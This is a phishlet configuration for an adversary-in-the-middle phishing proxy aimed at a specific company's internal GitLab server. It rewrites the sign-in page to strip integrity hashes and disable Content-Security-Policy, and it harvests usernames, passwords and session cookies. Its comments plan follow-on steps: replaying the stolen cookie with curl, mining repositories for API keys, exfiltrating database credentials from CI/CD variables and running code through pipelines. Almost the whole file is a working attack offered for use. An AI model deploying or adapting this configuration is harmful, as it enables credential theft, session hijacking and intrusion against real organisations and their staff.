gitlab.yaml

author: 'Whispergate'
min_ver: '2.3.0'
# Target  : http://gitlab.dev.sbg.corp  (Sterling Bridge internal GitLab CE)
# IP      : 10.X.20.15  (VLAN 20 — dev.sbg.corp)
# Captures: user[login] + user[password] on POST to /users/sign_in
#           _gitlab_session — encrypted Rack session cookie (full portal access)
#           remember_user_token — persists access across sessions
#
# Attack path:
#   Developers often reuse corporate SSO passwords for GitLab.
#   Captured _gitlab_session replays to /dashboard — attacker can then:
#     - Browse repositories for production API keys / OAuth secrets
#     - Exfiltrate the MSSQL linked-server credentials stored in CI/CD vars
#     - Trigger a pipeline to execute code on DEV (DPAPI secrets path)
#
# Replay:
#   curl -b "_gitlab_session=<val>" http://gitlab.dev.sbg.corp/dashboard

proxy_hosts:
  - {phish_sub: 'gitlab', orig_sub: '', domain: 'gitlab.dev.sbg.corp', session: true, is_landing: true, auto_filter: true}

sub_filters:
  # GitLab embeds CSP nonces and integrity hashes — strip them
  - {triggers_on: 'gitlab.dev.sbg.corp', orig_sub: '', domain: 'gitlab.dev.sbg.corp', search: 'integrity="sha[^"]*"', replace: '', mimes: ['text/html']}
  - {triggers_on: 'gitlab.dev.sbg.corp', orig_sub: '', domain: 'gitlab.dev.sbg.corp', search: 'nonce="[^"]*"', replace: '', mimes: ['text/html']}
  # Rewrite the Content-Security-Policy meta tag so the browser doesn't enforce it
  - {triggers_on: 'gitlab.dev.sbg.corp', orig_sub: '', domain: 'gitlab.dev.sbg.corp', search: 'content-security-policy', replace: 'x-csp-disabled', mimes: ['text/html']}

auth_tokens:
  - domain: '.gitlab.dev.sbg.corp'
    keys: ['_gitlab_session', 'remember_user_token', 'event_filter']

# GitLab sign-in uses Rails UJS form with user[login] / user[password] params
credentials:
  username:
    key: 'user\[login\]'
    search: '(.*)'
    type: 'post'
  password:
    key: 'user\[password\]'
    search: '(.*)'
    type: 'post'

login:
  domain: 'gitlab.dev.sbg.corp'
  path: '/users/sign_in'